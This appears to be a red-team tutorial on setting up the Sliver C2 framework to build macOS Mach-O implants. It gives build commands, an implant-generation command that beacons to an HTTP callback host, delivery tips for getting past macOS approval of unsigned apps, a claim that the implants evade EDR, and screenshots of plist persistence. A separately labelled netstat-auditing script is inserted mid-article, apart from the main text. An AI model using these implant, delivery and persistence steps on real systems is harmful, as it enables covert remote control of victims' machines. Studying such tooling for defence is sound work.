How to use the Sliver C2 framework

Setting up and using the Sliver framework

The Sliver exploitation framework can be utilised against all operating systems, and that includes Apple Mac OS X. The osxcross project is required, plus the Sliver daemon.
The steps are therefore to set up and install Sliver, sliver-server and osxcross (https://github.com/tpoechtrager/osxcross#packaging-the-sdk).
The Linux server must also have the Xcode_7.0.1.dmg and Command Line Tools.pkg files in the correct folders to create Mac implants.
Begin creation with:
gen_sdk_package_tools_dmg.sh Xcode_7.0.1.dmg
./target/bin/xar -xf "Command Line Tools.pkg" -C /home/v/installs/osxcross/build/tmp_29947/ pkg_data
./gen_sdk_package_p7zip.sh Xcode_7.0.1.dmg
mv MacOSX10.11.sdk.tar.bz2 installs/osxcross/tarballs/

The sliver-server must always be running as a daemon. It needs to be started with systemctl start sliver (or sliver-server if you called it that). Reference: Dominic Breuker, Learning sliver c2 installation.

sudo netstat -antop | grep 31337 will show the service started:
tcp6   0  0 :::31337            :::*                LISTEN  8496/sliver-server   off (0.00/0/0)

Then the framework's command interface must be started with the command sliver, which shows the command-line interface.
That connects the client like so:
tcp6   0  0 ::1:31337           ::1:37598           ESTABLISHED 8496/sliver-server   keepalive (12.41/0/0)
tcp6   0  0 ::1:37598           ::1:31337           ESTABLISHED 13583/sliver     keepalive (12.35/0/0)
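
As a check on the socket listings above, this added example (not from the original article or the Sliver project) reads netstat -antop output and reports whether the port-31337 listener is bound beyond loopback and whether any connected client is remote. The function names, the SLIVER_PORT variable and the fourth sample line are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit `netstat -antop` output for the sliver-server port.
# Assumption: the port is 31337, as in the listings above; override SLIVER_PORT.
SLIVER_PORT="${SLIVER_PORT:-31337}"

# Constructed sample: the three lines shown in the article plus one invented
# remote peer (192.0.2.10 is a documentation address).
sample_netstat() {
    cat <<'EOF'
tcp6   0  0 :::31337            :::*                LISTEN  8496/sliver-server   off (0.00/0/0)
tcp6   0  0 ::1:31337           ::1:37598           ESTABLISHED 8496/sliver-server   keepalive (12.41/0/0)
tcp6   0  0 ::1:37598           ::1:31337           ESTABLISHED 13583/sliver     keepalive (12.35/0/0)
tcp6   0  0 ::ffff:10.0.0.1:31337 ::ffff:192.0.2.10:50122 ESTABLISHED 8496/sliver-server keepalive (3.10/0/0)
EOF
}

# Reads netstat -antop lines on stdin and prints one finding per socket whose
# LOCAL port is SLIVER_PORT (client-side sockets are skipped).
audit_sliver_port() {
    awk -v port="$SLIVER_PORT" '
    # Strip the trailing ":port" so IPv6 and IPv4-mapped hosts survive intact.
    function host(addr) { sub(/:[^:]*$/, "", addr); return addr }
    function is_loopback(h) { return (h == "::1" || h ~ /^(::ffff:)?127\./) }
    $1 ~ /^tcp/ {
        n = split($4, parts, ":")
        if (parts[n] != port) next
        if ($6 == "LISTEN") {
            lhost = host($4)
            # A "::" or "0.0.0.0" bind exposes the port on every interface.
            if (is_loopback(lhost)) print "OK listener loopback-only " $7
            else print "WARN listener reachable on " lhost " " $7
        } else if ($6 == "ESTABLISHED") {
            if (is_loopback(host($5))) print "OK local client " $5
            else print "WARN remote client " $5
        }
    }'
}

# Live use: sudo netstat -antop | audit_sliver_port
```
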

From there it is straightforward to create a Mach-O implant with the command: generate --http 10.0.0.1 --os mac --save /home/user/
Ensure the protocol job for the implant is running: jobs
The download was needed on one protocol (HTTPS), with the C2 implant communicating back on another protocol (HTTP jobs).
Osascript can be saved as an application type and perform the steps to run the C2.
Application files from the Internet that are not signed can't be run without approval, but local files / SMB files can.
Privesc needed Xcode installed plus clang++ execution, as standard clang threw too many issues.
Sliver implants are Golang-based Mach-O binaries and are not stopped from execution by EDR.


[Screenshot: Sliver CLI, with sessions listed and new arriving session from implant]

[Screenshot: Sliver CLI select session]

[Screenshot: Using Sliver shell, updating a Mac OS X plist for persistence]

[Screenshot: Plist detail]